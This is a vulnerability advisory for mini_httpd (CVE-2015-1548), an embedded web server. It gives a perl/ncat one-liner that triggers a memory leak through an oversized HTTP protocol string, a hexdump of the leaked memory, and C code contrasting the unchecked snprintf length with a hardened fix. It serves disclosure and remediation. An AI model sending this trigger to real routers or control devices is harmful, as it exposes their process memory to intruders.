
mini_httpd v1.21 information disclosure

Peter Kasza

A small webserver for your devices

mini_httpd is a small web server used mostly in embedded environments such as routers, modems and industrial control devices. The most prevalent version on the internet is based on mini_httpd/1.19 19dec2003, and the deployed binaries usually contain vendor-specific patches.

Information disclosure

The web server contains an information disclosure vulnerability: a request whose protocol string is long enough makes the server return parts of the process's memory in its response. The vulnerability affects v1.21 and earlier.

Triggering the bug

perl -e 'print "GET / " . "X"x65536 . "/Y" . "\r\n\r\n"' | ncat localhost 80

Response from the server

00000000  58 58 58 58 58 58 58 58  58 58 58 58 58 58 58 58  |XXXXXXXXXXXXXXXX|
*
00002700  58 58 58 58 58 58 58 58  58 58 58 58 58 58 58 00  |XXXXXXXXXXXXXXX.|
00002710  90 60 1f 95 ff 7f 00 00  d0 5f 1f 95 ff 7f 00 00  |.`......._......|
00002720  00 00 00 00 00 00 00 00  10 87 d8 1b b1 7f 00 00  |................|
00002730  60 00 00 00 00 00 00 00  98 89 40 00 00 00 00 00  |`.........@.....|
00002740  ff ff 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
00002750  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00002790  00 0c 00 00 00 00 00 00  ff ff ff ff 00 00 00 00  |................|
000027a0  04 00 00 00 00 00 00 00  23 85 40 00 00 00 00 00  |........#.@.....|
000027b0  30 00 00 00 00 00 00 00  34 00 00 00 00 00 00 00  |0.......4.......|
000027c0  03 00 00 00 00 00 00 00  2d 4a 40 00 00 00 00 00  |........-J@.....|
000027d0  8d 0c 85 42 00 00 00 00  a1 49 40 00 00 00 00 00  |...B.....I@.....|
000027e0  00 00 00 00 00 00 00 00  00 00 00 00 04 00 00 00  |................|
000027f0  00 00 00 00 00 00 00 00  50 01 20 95 ff 7f 00 00  |........P. .....|
00002800  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00009d30  74 65 78 74 2f 68 74 6d  6c 3b 20 63 68 61 72 73  |text/html; chars|
00009d40  65 74 3d 55 54 46 2d 38  00 00 00 00 00 00 00 00  |et=UTF-8........|
00009d50  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
0000a130  2e 00 69 6e 64 65 78 2e  68 74 6d 6c 00 00 00 00  |..index.html....|
0000a140  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
0000c840  40 2e 61 00 00 00 00 00  80 76 20 95 ff 7f 00 00  |@.a......v .....|
0000c850  b0 76 20 95 ff 7f 00 00  58 6e 36 02 00 00 00 00  |.v .....Xn6.....|
0000c860  57 89 40 00 00 00 00 00  ff 7f 00 00 00 00 00 00  |W.@.............|
0000c870  00 00 00 00 00 00 00 00  35 57 40 00 00 00 00 00  |........5W@.....|
0000c880  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
0000c8a0  2e 2f 69 6e 64 65 78 2e  68 74 6d 6c 00 00 00 00  |./index.html....|
0000c8b0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
00010000  00 00 00 00 00 00 00 00  00 00 00 53 65 72 76 65  |...........Serve|
00010010  72 3a 20 6d 69 6e 69 5f  68 74 74 70 64 2f 31 2e  |r: mini_httpd/1.|
00010020  32 31 20 31 38 6f 63 74  32 30 31 34 0d 0a 44 61  |21 18oct2014..Da|
00010030  74 65 3a 20 46 72 69 2c  20 32 33 20 4a 61 6e 20  |te: Fri, 23 Jan |
00010040  32 30 31 35 20 31 31 3a  34 37 3a 35 31 20 47 4d  |2015 11:47:51 GM|
00010050  54 0d 0a 43 6f 6e 74 65  6e 74 2d 54 79 70 65 3a  |T..Content-Type:|
00010060  20 74 65 78 74 2f 68 74  6d 6c 3b 20 63 68 61 72  | text/html; char|
00010070  73 65 74 3d 55 54 46 2d  38 0d 0a 43 6f 6e 74 65  |set=UTF-8..Conte|
00010080  6e 74 2d 4c 65 6e 67 74  68 3a 20 33 32 36 0d 0a  |nt-Length: 326..|
00010090  4c 61 73 74 2d 4d 6f 64  69 66 69 65 64 3a 20 46  |Last-Modified: F|
000100a0  72 69 2c 20 31 33 20 4d  61 79 20 32 30 30 35 20  |ri, 13 May 2005 |
000100b0  32 30 3a 32 32 3a 33 37  20 47 4d 54 0d 0a 43 6f  |20:22:37 GMT..Co|
000100c0  6e 6e 65 63 74 69 6f 6e  3a 20 63 6c 6f 73 65 0d  |nnection: close.|

Source of the bug

The vulnerability occurs because the server miscalculates the size of the response. When the buffer is too small, snprintf returns the number of bytes that would have been needed to store the whole message, not the number of bytes actually written. mini_httpd trusts the size returned by snprintf without checking it against the buffer size, so when the protocol string is longer than 10000 bytes it copies a chunk of memory past the end of the buffer into the response.

// mini_httpd.c:2500
static void add_headers(...) {
    char buf[10000];   // fixed-size stack buffer for the status line
    ...
    // snprintf() truncates at sizeof(buf) but returns the length of the full
    // formatted line, so buflen can exceed 10000 when protocol is long
    buflen = snprintf( buf, sizeof(buf), "%s %d %s\015\012", protocol, status, title );
    // buflen is never compared with sizeof(buf): the copy reads past buf
    add_to_response( buf, buflen );
}
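The formatting step of add_headers() modelled in C, as an added example that is not the author's or mini_httpd's own code: the vulnerable length computation next to a hardened one that checks the snprintf() return value against the buffer, plus a parse-time plausibility check on the protocol token. BUF_SIZE mirrors the 10000-byte buffer from the excerpt; the function names, the 200/OK status and the plausibility policy are assumptions made for the example.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Same stack buffer size as the add_headers() excerpt. */
#define BUF_SIZE 10000

/* Vulnerable pattern: the snprintf() return value is handed straight to the
 * caller as the byte count. snprintf() returns the length the full line
 * *would* have had, so when the line does not fit this is larger than the
 * buffer, and a caller that copies that many bytes reads past buf. */
static size_t status_line_len_unsafe(char *buf, size_t bufsize,
                                     const char *protocol, int status,
                                     const char *title)
{
    int n = snprintf(buf, bufsize, "%s %d %s\r\n", protocol, status, title);
    return n < 0 ? 0 : (size_t)n;      /* no bounds check: the bug */
}

/* Hardened form: compare the return value with the buffer size and report
 * only the bytes actually stored (bufsize - 1 when truncated, because
 * snprintf() always reserves one byte for the terminating NUL). */
static size_t status_line_len_safe(char *buf, size_t bufsize,
                                   const char *protocol, int status,
                                   const char *title, int *truncated)
{
    int n = snprintf(buf, bufsize, "%s %d %s\r\n", protocol, status, title);
    *truncated = 0;
    if (n < 0) {                      /* encoding error: emit nothing */
        buf[0] = '\0';
        return 0;
    }
    if ((size_t)n >= bufsize) {       /* the line did not fit */
        *truncated = 1;
        return bufsize - 1;
    }
    return (size_t)n;
}

/* Defence in depth at parse time: an HTTP-version token is "HTTP/" followed
 * by a short version number; anything long or oddly shaped is rejected before
 * it reaches the formatting code. (Constructed policy, not mini_httpd's.) */
static int protocol_token_plausible(const char *protocol)
{
    size_t len = strlen(protocol);
    return len >= 6 && len <= 16 && strncmp(protocol, "HTTP/", 5) == 0;
}

/* Build a constructed protocol string of `plen` 'X' bytes (like the perl
 * one-liner above) and return how many bytes past the end of buf the
 * vulnerable length would make the response copy read. 0 means no over-read. */
static size_t overread_for_protocol_len(size_t plen)
{
    char buf[BUF_SIZE];
    char *protocol = malloc(plen + 1);
    size_t n;
    if (protocol == NULL) return 0;
    memset(protocol, 'X', plen);
    protocol[plen] = '\0';
    n = status_line_len_unsafe(buf, sizeof buf, protocol, 200, "OK");
    free(protocol);
    return n > sizeof buf ? n - sizeof buf : 0;
}

/* Same constructed input through the hardened path: returns the byte count
 * that would be sent and stores whether the line was truncated. */
static size_t safe_len_for_protocol_len(size_t plen, int *truncated)
{
    char buf[BUF_SIZE];
    char *protocol = malloc(plen + 1);
    size_t n;
    if (protocol == NULL) { *truncated = 0; return 0; }
    memset(protocol, 'X', plen);
    protocol[plen] = '\0';
    n = status_line_len_safe(buf, sizeof buf, protocol, 200, "OK", truncated);
    free(protocol);
    return n;
}

int main(void)
{
    int trunc = 0;
    printf("HTTP/1.1 : over-read %zu bytes\n", overread_for_protocol_len(8));
    printf("65538 X's: over-read %zu bytes\n", overread_for_protocol_len(65538));
    printf("hardened : sends %zu bytes, truncated=%d\n",
           safe_len_for_protocol_len(65538, &trunc), trunc);
    return 0;
}
```

With the 65538-byte protocol string, the unsafe length is 65547 (the 9 extra bytes are the space, "200", the space, "OK" and CRLF), so 55547 bytes beyond the buffer would be appended to the response; the hardened path reports 9999 bytes and flags the truncation, matching the 9999 'X' bytes followed by a NUL at offset 0x2700 in the dump above.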

Edit: MITRE has assigned CVE-2015-1548 to this issue.